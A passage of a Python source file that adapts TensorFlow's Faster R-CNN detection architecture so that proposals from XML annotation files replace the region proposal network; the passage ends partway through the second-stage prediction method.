code
stringlengths 10
805k
| def_use_chains
sequencelengths 0
667
|
---|---|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Faster R-CNN meta-architecture definition.
General tensorflow implementation of Faster R-CNN detection models.
See Faster R-CNN: Ren, Shaoqing, et al.
"Faster R-CNN: Towards real-time object detection with region proposal
networks." Advances in neural information processing systems. 2015.
We allow for three modes: number_of_stages={1, 2, 3}. In case of 1 stage,
all of the user facing methods (e.g., predict, postprocess, loss) can be used as
if the model consisted only of the RPN, returning class agnostic proposals
(these can be thought of as approximate detections with no associated class
information). In case of 2 stages, proposals are computed, then passed
through a second stage "box classifier" to yield (multi-class) detections.
Finally, in case of 3 stages which is only used during eval, proposals are
computed, then passed through a second stage "box classifier" that will compute
refined boxes and classes, and then features are pooled from the refined and
non-maximum suppressed boxes and are passed through the box classifier again. If
number of stages is 3 during training it will be reduced to two automatically.
Implementations of Faster R-CNN models must define a new
FasterRCNNFeatureExtractor and override three methods: `preprocess`,
`_extract_proposal_features` (the first stage of the model), and
`_extract_box_classifier_features` (the second stage of the model). Optionally,
the `restore_fn` method can be overridden. See tests for an example.
A few important notes:
+ Batching conventions: We support batched inference and training where
all images within a batch have the same resolution. Batch sizes are determined
dynamically via the shape of the input tensors (rather than being specified
directly as, e.g., a model constructor).
A complication is that due to non-max suppression, we are not guaranteed to get
the same number of proposals from the first stage RPN (region proposal network)
for each image (though in practice, we should often get the same number of
proposals). For this reason we pad to a max number of proposals per image
within a batch. This `self.max_num_proposals` property is set to the
`first_stage_max_proposals` parameter at inference time and the
`second_stage_batch_size` at training time since we subsample the batch to
be sent through the box classifier during training.
For the second stage of the pipeline, we arrange the proposals for all images
within the batch along a single batch dimension. For example, the input to
_extract_box_classifier_features is a tensor of shape
`[total_num_proposals, crop_height, crop_width, depth]` where
total_num_proposals is batch_size * self.max_num_proposals. (And note that per
the above comment, a subset of these entries correspond to zero paddings.)
+ Coordinate representations:
Following the API (see model.DetectionModel definition), our outputs after
postprocessing operations are always normalized boxes however, internally, we
sometimes convert to absolute --- e.g. for loss computation. In particular,
anchors and proposal_boxes are both represented as absolute coordinates.
Images are resized in the `preprocess` method.
The Faster R-CNN meta architecture has two post-processing methods
`_postprocess_rpn` which is applied after first stage and
`_postprocess_box_classifier` which is applied after second stage. There are
three different ways post-processing can happen depending on number_of_stages
configured in the meta architecture:
1. When number_of_stages is 1:
`_postprocess_rpn` is run as part of the `postprocess` method where
true_image_shapes is used to clip proposals, perform non-max suppression and
normalize them.
2. When number of stages is 2:
`_postprocess_rpn` is run as part of the `_predict_second_stage` method where
`resized_image_shapes` is used to clip proposals, perform non-max suppression
and normalize them. In this case `postprocess` method skips `_postprocess_rpn`
and only runs `_postprocess_box_classifier` using `true_image_shapes` to clip
detections, perform non-max suppression and normalize them.
3. When number of stages is 3:
`_postprocess_rpn` is run as part of the `_predict_second_stage` using
`resized_image_shapes` to clip proposals, perform non-max suppression and
normalize them. Subsequently, `_postprocess_box_classifier` is run as part of
`_predict_third_stage` using `true_image_shapes` to clip detections, peform
non-max suppression and normalize them. In this case, the `postprocess` method
skips both `_postprocess_rpn` and `_postprocess_box_classifier`.
"""
from abc import abstractmethod
from functools import partial
import tensorflow as tf
import json
import numpy as np
from object_detection.anchor_generators import grid_anchor_generator
from object_detection.builders import box_predictor_builder
from object_detection.core import box_list
from object_detection.core import box_list_ops
from object_detection.core import box_predictor
from object_detection.core import losses
from object_detection.core import model
from object_detection.core import post_processing
from object_detection.core import standard_fields as fields
from object_detection.core import target_assigner
from object_detection.utils import ops
from object_detection.utils import shape_utils
import sys # for debug
sys.path.append("/notebooks/text-renderer/")
import data_util
slim = tf.contrib.slim
class FasterRCNNFeatureExtractor(object):
"""Faster R-CNN Feature Extractor definition."""
def __init__(self,
is_training,
first_stage_features_stride,
batch_norm_trainable=False,
reuse_weights=None,
weight_decay=0.0):
"""Constructor.
Args:
is_training: A boolean indicating whether the training version of the
computation graph should be constructed.
first_stage_features_stride: Output stride of extracted RPN feature map.
batch_norm_trainable: Whether to update batch norm parameters during
training or not. When training with a relative large batch size
(e.g. 8), it could be desirable to enable batch norm update.
reuse_weights: Whether to reuse variables. Default is None.
weight_decay: float weight decay for feature extractor (default: 0.0).
"""
self._is_training = is_training
self._first_stage_features_stride = first_stage_features_stride
self._train_batch_norm = (batch_norm_trainable and is_training)
self._reuse_weights = reuse_weights
self._weight_decay = weight_decay
@abstractmethod
def preprocess(self, resized_inputs):
"""Feature-extractor specific preprocessing (minus image resizing)."""
pass
def extract_proposal_features(self, preprocessed_inputs, scope):
"""Extracts first stage RPN features.
This function is responsible for extracting feature maps from preprocessed
images. These features are used by the region proposal network (RPN) to
predict proposals.
Args:
preprocessed_inputs: A [batch, height, width, channels] float tensor
representing a batch of images.
scope: A scope name.
Returns:
rpn_feature_map: A tensor with shape [batch, height, width, depth]
activations: A dictionary mapping activation tensor names to tensors.
"""
with tf.variable_scope(scope, values=[preprocessed_inputs]):
return self._extract_proposal_features(preprocessed_inputs, scope)
@abstractmethod
def _extract_proposal_features(self, preprocessed_inputs, scope):
"""Extracts first stage RPN features, to be overridden."""
pass
def extract_box_classifier_features(self, proposal_feature_maps, scope):
"""Extracts second stage box classifier features.
Args:
proposal_feature_maps: A 4-D float tensor with shape
[batch_size * self.max_num_proposals, crop_height, crop_width, depth]
representing the feature map cropped to each proposal.
scope: A scope name.
Returns:
proposal_classifier_features: A 4-D float tensor with shape
[batch_size * self.max_num_proposals, height, width, depth]
representing box classifier features for each proposal.
"""
with tf.variable_scope(
scope, values=[proposal_feature_maps], reuse=tf.AUTO_REUSE):
return self._extract_box_classifier_features(proposal_feature_maps, scope)
@abstractmethod
def _extract_box_classifier_features(self, proposal_feature_maps, scope):
"""Extracts second stage box classifier features, to be overridden."""
pass
def restore_from_classification_checkpoint_fn(
self,
first_stage_feature_extractor_scope,
second_stage_feature_extractor_scope):
"""Returns a map of variables to load from a foreign checkpoint.
Args:
first_stage_feature_extractor_scope: A scope name for the first stage
feature extractor.
second_stage_feature_extractor_scope: A scope name for the second stage
feature extractor.
Returns:
A dict mapping variable names (to load from a checkpoint) to variables in
the model graph.
"""
variables_to_restore = {}
for variable in tf.global_variables():
for scope_name in [first_stage_feature_extractor_scope,
second_stage_feature_extractor_scope]:
if variable.op.name.startswith(scope_name):
var_name = variable.op.name.replace(scope_name + '/', '')
variables_to_restore[var_name] = variable
return variables_to_restore
class FasterRCNNMetaArchOverrideRPN(model.DetectionModel):
"""Faster R-CNN Meta-architecture definition."""
def __init__(self,
is_training,
num_classes,
image_resizer_fn,
feature_extractor,
number_of_stages,
first_stage_anchor_generator,
first_stage_target_assigner,
first_stage_atrous_rate,
first_stage_box_predictor_arg_scope_fn,
first_stage_box_predictor_kernel_size,
first_stage_box_predictor_depth,
first_stage_minibatch_size,
first_stage_sampler,
first_stage_nms_score_threshold,
first_stage_nms_iou_threshold,
first_stage_max_proposals,
first_stage_proposals_path,
first_stage_localization_loss_weight,
first_stage_objectness_loss_weight,
initial_crop_size,
maxpool_kernel_size,
maxpool_stride,
second_stage_target_assigner,
second_stage_mask_rcnn_box_predictor,
second_stage_batch_size,
second_stage_sampler,
second_stage_non_max_suppression_fn,
second_stage_score_conversion_fn,
second_stage_localization_loss_weight,
second_stage_classification_loss_weight,
second_stage_classification_loss,
second_stage_mask_prediction_loss_weight=1.0,
hard_example_miner=None,
parallel_iterations=16,
add_summaries=True,
use_matmul_crop_and_resize=False,
clip_anchors_to_image=False):
"""FasterRCNNMetaArch Constructor.
Args:
is_training: A boolean indicating whether the training version of the
computation graph should be constructed.
num_classes: Number of classes. Note that num_classes *does not*
include the background category, so if groundtruth labels take values
in {0, 1, .., K-1}, num_classes=K (and not K+1, even though the
assigned classification targets can range from {0,... K}).
image_resizer_fn: A callable for image resizing. This callable
takes a rank-3 image tensor of shape [height, width, channels]
(corresponding to a single image), an optional rank-3 instance mask
tensor of shape [num_masks, height, width] and returns a resized rank-3
image tensor, a resized mask tensor if one was provided in the input. In
addition this callable must also return a 1-D tensor of the form
[height, width, channels] containing the size of the true image, as the
image resizer can perform zero padding. See protos/image_resizer.proto.
feature_extractor: A FasterRCNNFeatureExtractor object.
number_of_stages: An integer values taking values in {1, 2, 3}. If
1, the function will construct only the Region Proposal Network (RPN)
part of the model. If 2, the function will perform box refinement and
other auxiliary predictions all in the second stage. If 3, it will
extract features from refined boxes and perform the auxiliary
predictions on the non-maximum suppressed refined boxes.
If is_training is true and the value of number_of_stages is 3, it is
reduced to 2 since all the model heads are trained in parallel in second
stage during training.
first_stage_anchor_generator: An anchor_generator.AnchorGenerator object
(note that currently we only support
grid_anchor_generator.GridAnchorGenerator objects)
first_stage_target_assigner: Target assigner to use for first stage of
Faster R-CNN (RPN).
first_stage_atrous_rate: A single integer indicating the atrous rate for
the single convolution op which is applied to the `rpn_features_to_crop`
tensor to obtain a tensor to be used for box prediction. Some feature
extractors optionally allow for producing feature maps computed at
denser resolutions. The atrous rate is used to compensate for the
denser feature maps by using an effectively larger receptive field.
(This should typically be set to 1).
first_stage_box_predictor_arg_scope_fn: A function to construct tf-slim
arg_scope for conv2d, separable_conv2d and fully_connected ops for the
RPN box predictor.
first_stage_box_predictor_kernel_size: Kernel size to use for the
convolution op just prior to RPN box predictions.
first_stage_box_predictor_depth: Output depth for the convolution op
just prior to RPN box predictions.
first_stage_minibatch_size: The "batch size" to use for computing the
objectness and location loss of the region proposal network. This
"batch size" refers to the number of anchors selected as contributing
to the loss function for any given image within the image batch and is
only called "batch_size" due to terminology from the Faster R-CNN paper.
first_stage_sampler: Sampler to use for first stage loss (RPN loss).
first_stage_nms_score_threshold: Score threshold for non max suppression
for the Region Proposal Network (RPN). This value is expected to be in
[0, 1] as it is applied directly after a softmax transformation. The
recommended value for Faster R-CNN is 0.
first_stage_nms_iou_threshold: The Intersection Over Union (IOU) threshold
for performing Non-Max Suppression (NMS) on the boxes predicted by the
Region Proposal Network (RPN).
first_stage_max_proposals: Maximum number of boxes to retain after
performing Non-Max Suppression (NMS) on the boxes predicted by the
Region Proposal Network (RPN).
first_stage_localization_loss_weight: A float
first_stage_objectness_loss_weight: A float
initial_crop_size: A single integer indicating the output size
(width and height are set to be the same) of the initial bilinear
interpolation based cropping during ROI pooling.
maxpool_kernel_size: A single integer indicating the kernel size of the
max pool op on the cropped feature map during ROI pooling.
maxpool_stride: A single integer indicating the stride of the max pool
op on the cropped feature map during ROI pooling.
second_stage_target_assigner: Target assigner to use for second stage of
Faster R-CNN. If the model is configured with multiple prediction heads,
this target assigner is used to generate targets for all heads (with the
correct `unmatched_class_label`).
second_stage_mask_rcnn_box_predictor: Mask R-CNN box predictor to use for
the second stage.
second_stage_batch_size: The batch size used for computing the
classification and refined location loss of the box classifier. This
"batch size" refers to the number of proposals selected as contributing
to the loss function for any given image within the image batch and is
only called "batch_size" due to terminology from the Faster R-CNN paper.
second_stage_sampler: Sampler to use for second stage loss (box
classifier loss).
second_stage_non_max_suppression_fn: batch_multiclass_non_max_suppression
callable that takes `boxes`, `scores`, optional `clip_window` and
optional (kwarg) `mask` inputs (with all other inputs already set)
and returns a dictionary containing tensors with keys:
`detection_boxes`, `detection_scores`, `detection_classes`,
`num_detections`, and (optionally) `detection_masks`. See
`post_processing.batch_multiclass_non_max_suppression` for the type and
shape of these tensors.
second_stage_score_conversion_fn: Callable elementwise nonlinearity
(that takes tensors as inputs and returns tensors). This is usually
used to convert logits to probabilities.
second_stage_localization_loss_weight: A float indicating the scale factor
for second stage localization loss.
second_stage_classification_loss_weight: A float indicating the scale
factor for second stage classification loss.
second_stage_classification_loss: Classification loss used by the second
stage classifier. Either losses.WeightedSigmoidClassificationLoss or
losses.WeightedSoftmaxClassificationLoss.
second_stage_mask_prediction_loss_weight: A float indicating the scale
factor for second stage mask prediction loss. This is applicable only if
second stage box predictor is configured to predict masks.
hard_example_miner: A losses.HardExampleMiner object (can be None).
parallel_iterations: (Optional) The number of iterations allowed to run
in parallel for calls to tf.map_fn.
add_summaries: boolean (default: True) controlling whether summary ops
should be added to tensorflow graph.
use_matmul_crop_and_resize: Force the use of matrix multiplication based
crop and resize instead of standard tf.image.crop_and_resize while
computing second stage input feature maps.
clip_anchors_to_image: Normally, anchors generated for a given image size
are pruned during training if they lie outside the image window. This
option clips the anchors to be within the image instead of pruning.
Raises:
ValueError: If `second_stage_batch_size` > `first_stage_max_proposals` at
training time.
ValueError: If first_stage_anchor_generator is not of type
grid_anchor_generator.GridAnchorGenerator.
"""
# TODO(rathodv): add_summaries is currently unused. Respect that directive
# in the future.
print("Running FasterRCNN with overriden RPN")
super(FasterRCNNMetaArchOverrideRPN, self).__init__(num_classes=num_classes)
# There is no RPN in this implementation!
if (number_of_stages==1):
raise ValueError('Number of stages = 1 is not allowed for overriden RPN proposals')
if is_training and second_stage_batch_size > first_stage_max_proposals:
raise ValueError('second_stage_batch_size should be no greater than '
'first_stage_max_proposals.')
if not isinstance(first_stage_anchor_generator,
grid_anchor_generator.GridAnchorGenerator):
raise ValueError('first_stage_anchor_generator must be of type '
'grid_anchor_generator.GridAnchorGenerator.')
# Michele: Proposals that override the RPN
first_stage_proposals_path = os.path.join(first_stage_proposals_path, '')
xml_root = data_util.read_xml_batch(first_stage_proposals_path)[0]['annot']
_, self.proposals = data_util.xml_to_numpy(None, xml_root)
print("Shape of overriding proposals",self.proposals.shape)
self._is_training = is_training
self._image_resizer_fn = image_resizer_fn
self._feature_extractor = feature_extractor
self._number_of_stages = number_of_stages
self._proposal_target_assigner = first_stage_target_assigner
self._detector_target_assigner = second_stage_target_assigner
# Both proposal and detector target assigners use the same box coder
self._box_coder = self._proposal_target_assigner.box_coder
# (First stage) Region proposal network parameters
self._first_stage_anchor_generator = first_stage_anchor_generator
self._first_stage_atrous_rate = first_stage_atrous_rate
self._first_stage_box_predictor_arg_scope_fn = (
first_stage_box_predictor_arg_scope_fn)
self._first_stage_box_predictor_kernel_size = (
first_stage_box_predictor_kernel_size)
self._first_stage_box_predictor_depth = first_stage_box_predictor_depth
self._first_stage_minibatch_size = first_stage_minibatch_size
self._first_stage_sampler = first_stage_sampler
self._first_stage_box_predictor = (
box_predictor_builder.build_convolutional_box_predictor(
is_training=self._is_training,
num_classes=1,
conv_hyperparams_fn=self._first_stage_box_predictor_arg_scope_fn,
use_dropout=False,
dropout_keep_prob=1.0,
box_code_size=self._box_coder.code_size,
kernel_size=1,
num_layers_before_predictor=0,
min_depth=0,
max_depth=0))
self._first_stage_nms_score_threshold = first_stage_nms_score_threshold
self._first_stage_nms_iou_threshold = first_stage_nms_iou_threshold
self._first_stage_max_proposals = first_stage_max_proposals
self._first_stage_localization_loss = (
losses.WeightedSmoothL1LocalizationLoss())
self._first_stage_objectness_loss = (
losses.WeightedSoftmaxClassificationLoss())
self._first_stage_loc_loss_weight = first_stage_localization_loss_weight
self._first_stage_obj_loss_weight = first_stage_objectness_loss_weight
# Per-region cropping parameters
self._initial_crop_size = initial_crop_size
self._maxpool_kernel_size = maxpool_kernel_size
self._maxpool_stride = maxpool_stride
self._mask_rcnn_box_predictor = second_stage_mask_rcnn_box_predictor
self._second_stage_batch_size = second_stage_batch_size
self._second_stage_sampler = second_stage_sampler
self._second_stage_nms_fn = second_stage_non_max_suppression_fn
self._second_stage_score_conversion_fn = second_stage_score_conversion_fn
self._second_stage_localization_loss = (
losses.WeightedSmoothL1LocalizationLoss())
self._second_stage_classification_loss = second_stage_classification_loss
self._second_stage_mask_loss = (
losses.WeightedSigmoidClassificationLoss())
self._second_stage_loc_loss_weight = second_stage_localization_loss_weight
self._second_stage_cls_loss_weight = second_stage_classification_loss_weight
self._second_stage_mask_loss_weight = (
second_stage_mask_prediction_loss_weight)
self._use_matmul_crop_and_resize = use_matmul_crop_and_resize
self._hard_example_miner = hard_example_miner
self._parallel_iterations = parallel_iterations
self.clip_anchors_to_image = clip_anchors_to_image
if self._number_of_stages <= 0 or self._number_of_stages > 3:
raise ValueError('Number of stages should be a value in {1, 2, 3}.')
@property
def first_stage_feature_extractor_scope(self):
return 'FirstStageFeatureExtractor'
@property
def second_stage_feature_extractor_scope(self):
return 'SecondStageFeatureExtractor'
@property
def first_stage_box_predictor_scope(self):
return 'FirstStageBoxPredictor'
@property
def second_stage_box_predictor_scope(self):
return 'SecondStageBoxPredictor'
@property
def max_num_proposals(self):
"""Max number of proposals (to pad to) for each image in the input batch.
At training time, this is set to be the `second_stage_batch_size` if hard
example miner is not configured, else it is set to
`first_stage_max_proposals`. At inference time, this is always set to
`first_stage_max_proposals`.
Returns:
A positive integer.
"""
if self._is_training and not self._hard_example_miner:
return self._second_stage_batch_size
#return self._first_stage_max_proposals
return self.proposals.shape[1]
@property
def anchors(self):
if not self._anchors:
raise RuntimeError('anchors have not been constructed yet!')
if not isinstance(self._anchors, box_list.BoxList):
raise RuntimeError('anchors should be a BoxList object, but is not.')
return self._anchors
def preprocess(self, inputs):
"""Feature-extractor specific preprocessing.
See base class.
For Faster R-CNN, we perform image resizing in the base class --- each
class subclassing FasterRCNNMetaArch is responsible for any additional
preprocessing (e.g., scaling pixel values to be in [-1, 1]).
Args:
inputs: a [batch, height_in, width_in, channels] float tensor representing
a batch of images with values between 0 and 255.0.
Returns:
preprocessed_inputs: a [batch, height_out, width_out, channels] float
tensor representing a batch of images.
true_image_shapes: int32 tensor of shape [batch, 3] where each row is
of the form [height, width, channels] indicating the shapes
of true images in the resized images, as resized images can be padded
with zeros.
Raises:
ValueError: if inputs tensor does not have type tf.float32
"""
if inputs.dtype is not tf.float32:
raise ValueError('`preprocess` expects a tf.float32 tensor')
with tf.name_scope('Preprocessor'):
outputs = shape_utils.static_or_dynamic_map_fn(
self._image_resizer_fn,
elems=inputs,
dtype=[tf.float32, tf.int32],
parallel_iterations=self._parallel_iterations)
resized_inputs = outputs[0]
true_image_shapes = outputs[1]
return (self._feature_extractor.preprocess(resized_inputs),
true_image_shapes)
def _compute_clip_window(self, image_shapes):
"""Computes clip window for non max suppression based on image shapes.
This function assumes that the clip window's left top corner is at (0, 0).
Args:
image_shapes: A 2-D int32 tensor of shape [batch_size, 3] containing
shapes of images in the batch. Each row represents [height, width,
channels] of an image.
Returns:
A 2-D float32 tensor of shape [batch_size, 4] containing the clip window
for each image in the form [ymin, xmin, ymax, xmax].
"""
clip_heights = image_shapes[:, 0]
clip_widths = image_shapes[:, 1]
clip_window = tf.to_float(tf.stack([tf.zeros_like(clip_heights),
tf.zeros_like(clip_heights),
clip_heights, clip_widths], axis=1))
return clip_window
def predict(self, preprocessed_inputs, true_image_shapes):
"""Predicts unpostprocessed tensors from input tensor.
This function takes an input batch of images and runs it through the
forward pass of the network to yield "raw" un-postprocessed predictions.
If `number_of_stages` is 1, this function only returns first stage
RPN predictions (un-postprocessed). Otherwise it returns both
first stage RPN predictions as well as second stage box classifier
predictions.
Other remarks:
+ Anchor pruning vs. clipping: following the recommendation of the Faster
R-CNN paper, we prune anchors that venture outside the image window at
training time and clip anchors to the image window at inference time.
+ Proposal padding: as described at the top of the file, proposals are
padded to self._max_num_proposals and flattened so that proposals from all
images within the input batch are arranged along the same batch dimension.
Args:
preprocessed_inputs: a [batch, height, width, channels] float tensor
representing a batch of images.
true_image_shapes: int32 tensor of shape [batch, 3] where each row is
of the form [height, width, channels] indicating the shapes
of true images in the resized images, as resized images can be padded
with zeros.
Returns:
prediction_dict: a dictionary holding "raw" prediction tensors:
1) rpn_box_predictor_features: A 4-D float32 tensor with shape
[batch_size, height, width, depth] to be used for predicting proposal
boxes and corresponding objectness scores.
2) rpn_features_to_crop: A 4-D float32 tensor with shape
[batch_size, height, width, depth] representing image features to crop
using the proposal boxes predicted by the RPN.
3) image_shape: a 1-D tensor of shape [4] representing the input
image shape.
4) rpn_box_encodings: 3-D float tensor of shape
[batch_size, num_anchors, self._box_coder.code_size] containing
predicted boxes.
5) rpn_objectness_predictions_with_background: 3-D float tensor of shape
[batch_size, num_anchors, 2] containing class
predictions (logits) for each of the anchors. Note that this
tensor *includes* background class predictions (at class index 0).
6) anchors: A 2-D tensor of shape [num_anchors, 4] representing anchors
for the first stage RPN (in absolute coordinates). Note that
`num_anchors` can differ depending on whether the model is created in
training or inference mode.
(and if number_of_stages > 1):
7) refined_box_encodings: a 3-D tensor with shape
[total_num_proposals, num_classes, self._box_coder.code_size]
representing predicted (final) refined box encodings, where
total_num_proposals=batch_size*self._max_num_proposals. If using
a shared box across classes the shape will instead be
[total_num_proposals, 1, self._box_coder.code_size].
8) class_predictions_with_background: a 3-D tensor with shape
[total_num_proposals, num_classes + 1] containing class
predictions (logits) for each of the anchors, where
total_num_proposals=batch_size*self._max_num_proposals.
Note that this tensor *includes* background class predictions
(at class index 0).
9) num_proposals: An int32 tensor of shape [batch_size] representing the
number of proposals generated by the RPN. `num_proposals` allows us
to keep track of which entries are to be treated as zero paddings and
which are not since we always pad the number of proposals to be
`self.max_num_proposals` for each image.
10) proposal_boxes: A float32 tensor of shape
[batch_size, self.max_num_proposals, 4] representing
decoded proposal bounding boxes in absolute coordinates.
11) mask_predictions: (optional) a 4-D tensor with shape
[total_num_padded_proposals, num_classes, mask_height, mask_width]
containing instance mask predictions.
Raises:
ValueError: If `predict` is called before `preprocess`.
"""
'''(rpn_box_predictor_features, rpn_features_to_crop, anchors_boxlist,
image_shape) = self._extract_rpn_feature_maps(preprocessed_inputs)'''
print("Predict running")
image_shape = tf.shape(preprocessed_inputs)
rpn_features_to_crop, _ = self._feature_extractor.extract_proposal_features(
preprocessed_inputs, scope=self.first_stage_feature_extractor_scope)
#(rpn_box_encodings, rpn_objectness_predictions_with_background
#) = self._predict_rpn_proposals(rpn_box_predictor_features)
# The Faster R-CNN paper recommends pruning anchors that venture outside
# the image window at training time and clipping at inference time.
'''clip_window = tf.to_float(tf.stack([0, 0, image_shape[1], image_shape[2]]))
if self._is_training:
if self.clip_anchors_to_image:
anchors_boxlist = box_list_ops.clip_to_window(
anchors_boxlist, clip_window, filter_nonoverlapping=False)
else:
(rpn_box_encodings, rpn_objectness_predictions_with_background,
anchors_boxlist) = self._remove_invalid_anchors_and_predictions(
rpn_box_encodings, rpn_objectness_predictions_with_background,
anchors_boxlist, clip_window)
else:
anchors_boxlist = box_list_ops.clip_to_window(
anchors_boxlist, clip_window)
self._anchors = anchors_boxlist'''
prediction_dict = {
#'rpn_box_predictor_features': rpn_box_predictor_features,
'rpn_features_to_crop': rpn_features_to_crop,
'image_shape': image_shape,
#'rpn_box_encodings': rpn_box_encodings,
#'rpn_objectness_predictions_with_background':
#rpn_objectness_predictions_with_background,
#'anchors': self._anchors.get()
}
if self._number_of_stages >= 2:
'''prediction_dict.update(self._predict_second_stage(
rpn_box_encodings,
rpn_objectness_predictions_with_background,
rpn_features_to_crop,
self._anchors.get(), image_shape, true_image_shapes))'''
prediction_dict.update(self._predict_second_stage(
rpn_features_to_crop, image_shape, true_image_shapes))
if self._number_of_stages == 3:
prediction_dict = self._predict_third_stage(
prediction_dict, true_image_shapes)
return prediction_dict
def _image_batch_shape_2d(self, image_batch_shape_1d):
"""Takes a 1-D image batch shape tensor and converts it to a 2-D tensor.
Example:
If 1-D image batch shape tensor is [2, 300, 300, 3]. The corresponding 2-D
image batch tensor would be [[300, 300, 3], [300, 300, 3]]
Args:
image_batch_shape_1d: 1-D tensor of the form [batch_size, height,
width, channels].
Returns:
image_batch_shape_2d: 2-D tensor of shape [batch_size, 3] were each row is
of the form [height, width, channels].
"""
return tf.tile(tf.expand_dims(image_batch_shape_1d[1:], 0),
[image_batch_shape_1d[0], 1])
'''def _predict_second_stage(self, rpn_box_encodings,
rpn_objectness_predictions_with_background,
rpn_features_to_crop,
anchors,
image_shape,
true_image_shapes):
"""Predicts the output tensors from second stage of Faster R-CNN.
Args:
rpn_box_encodings: 4-D float tensor of shape
[batch_size, num_valid_anchors, self._box_coder.code_size] containing
predicted boxes.
rpn_objectness_predictions_with_background: 2-D float tensor of shape
[batch_size, num_valid_anchors, 2] containing class
predictions (logits) for each of the anchors. Note that this
tensor *includes* background class predictions (at class index 0).
rpn_features_to_crop: A 4-D float32 tensor with shape
[batch_size, height, width, depth] representing image features to crop
using the proposal boxes predicted by the RPN.
anchors: 2-D float tensor of shape
[num_anchors, self._box_coder.code_size].
image_shape: A 1D int32 tensors of size [4] containing the image shape.
true_image_shapes: int32 tensor of shape [batch, 3] where each row is
of the form [height, width, channels] indicating the shapes
of true images in the resized images, as resized images can be padded
with zeros.
Returns:
prediction_dict: a dictionary holding "raw" prediction tensors:
1) refined_box_encodings: a 3-D tensor with shape
[total_num_proposals, num_classes, self._box_coder.code_size]
representing predicted (final) refined box encodings, where
total_num_proposals=batch_size*self._max_num_proposals. If using a
shared box across classes the shape will instead be
[total_num_proposals, 1, self._box_coder.code_size].
2) class_predictions_with_background: a 3-D tensor with shape
[total_num_proposals, num_classes + 1] containing class
predictions (logits) for each of the anchors, where
total_num_proposals=batch_size*self._max_num_proposals.
Note that this tensor *includes* background class predictions
(at class index 0).
3) num_proposals: An int32 tensor of shape [batch_size] representing the
number of proposals generated by the RPN. `num_proposals` allows us
to keep track of which entries are to be treated as zero paddings and
which are not since we always pad the number of proposals to be
`self.max_num_proposals` for each image.
4) proposal_boxes: A float32 tensor of shape
[batch_size, self.max_num_proposals, 4] representing
decoded proposal bounding boxes in absolute coordinates.
5) proposal_boxes_normalized: A float32 tensor of shape
[batch_size, self.max_num_proposals, 4] representing decoded proposal
bounding boxes in normalized coordinates. Can be used to override the
boxes proposed by the RPN, thus enabling one to extract features and
get box classification and prediction for externally selected areas
of the image.
6) box_classifier_features: a 4-D float32 tensor representing the
features for each proposal.
"""
image_shape_2d = self._image_batch_shape_2d(image_shape)
proposal_boxes_normalized, _, num_proposals = self._postprocess_rpn(
rpn_box_encodings, rpn_objectness_predictions_with_background,
anchors, image_shape_2d, true_image_shapes)
# Override RPN proposals
# proposal_boxes_normalized = tf.Print(proposal_boxes_normalized, [], message=("original size= " + str(proposal_boxes_normalized.shape[1])))
# proposal_boxes_normalized = tf.constant(self.proposals, dtype='float32')
flattened_proposal_feature_maps = (
self._compute_second_stage_input_feature_maps(
rpn_features_to_crop, proposal_boxes_normalized))
box_classifier_features = (
self._feature_extractor.extract_box_classifier_features(
flattened_proposal_feature_maps,
scope=self.second_stage_feature_extractor_scope))
if self._mask_rcnn_box_predictor.is_keras_model:
box_predictions = self._mask_rcnn_box_predictor(
[box_classifier_features],
prediction_stage=2)
else:
box_predictions = self._mask_rcnn_box_predictor.predict(
[box_classifier_features],
num_predictions_per_location=[1],
scope=self.second_stage_box_predictor_scope,
prediction_stage=2)
refined_box_encodings = tf.squeeze(
box_predictions[box_predictor.BOX_ENCODINGS],
axis=1, name='all_refined_box_encodings')
class_predictions_with_background = tf.squeeze(
box_predictions[box_predictor.CLASS_PREDICTIONS_WITH_BACKGROUND],
axis=1, name='all_class_predictions_with_background')
absolute_proposal_boxes = ops.normalized_to_image_coordinates(
proposal_boxes_normalized, image_shape, self._parallel_iterations)
prediction_dict = {
'refined_box_encodings': refined_box_encodings,
'class_predictions_with_background':
class_predictions_with_background,
'num_proposals': num_proposals,
'proposal_boxes': absolute_proposal_boxes,
'box_classifier_features': box_classifier_features,
'proposal_boxes_normalized': proposal_boxes_normalized,
}
return prediction_dict'''
def _predict_second_stage(self, rpn_features_to_crop,
image_shape,
true_image_shapes):
"""Predicts the output tensors from second stage of Faster R-CNN.
Args:
rpn_features_to_crop: A 4-D float32 tensor with shape
[batch_size, height, width, depth] representing image features to crop
using the proposal boxes predicted by the RPN.
image_shape: A 1D int32 tensors of size [4] containing the image shape.
true_image_shapes: int32 tensor of shape [batch, 3] where each row is
of the form [height, width, channels] indicating the shapes
of true images in the resized images, as resized images can be padded
with zeros.
Returns:
prediction_dict: a dictionary holding "raw" prediction tensors:
1) refined_box_encodings: a 3-D tensor with shape
[total_num_proposals, num_classes, self._box_coder.code_size]
representing predicted (final) refined box encodings, where
total_num_proposals=batch_size*self._max_num_proposals. If using a
shared box across classes the shape will instead be
[total_num_proposals, 1, self._box_coder.code_size].
2) class_predictions_with_background: a 3-D tensor with shape
[total_num_proposals, num_classes + 1] containing class
predictions (logits) for each of the anchors, where
total_num_proposals=batch_size*self._max_num_proposals.
Note that this tensor *includes* background class predictions
(at class index 0).
3) num_proposals: An int32 tensor of shape [batch_size] representing the
number of proposals generated by the RPN. `num_proposals` allows us
to keep track of which entries are to be treated as zero paddings and
which are not since we always pad the number of proposals to be
`self.max_num_proposals` for each image.
4) proposal_boxes: A float32 tensor of shape
[batch_size, self.max_num_proposals, 4] representing
decoded proposal bounding boxes in absolute coordinates.
5) proposal_boxes_normalized: A float32 tensor of shape
[batch_size, self.max_num_proposals, 4] representing decoded proposal
bounding boxes in normalized coordinates. Can be used to override the
boxes proposed by the RPN, thus enabling one to extract features and
get box classification and prediction for externally selected areas
of the image.
6) box_classifier_features: a 4-D float32 tensor representing the
features for each proposal.
"""
image_shape_2d = self._image_batch_shape_2d(image_shape) # same as true shape
'''proposal_boxes_normalized, _, num_proposals = self._postprocess_rpn(
rpn_box_encodings, rpn_objectness_predictions_with_background,
anchors, image_shape_2d, true_image_shapes)'''
# Override RPN proposals
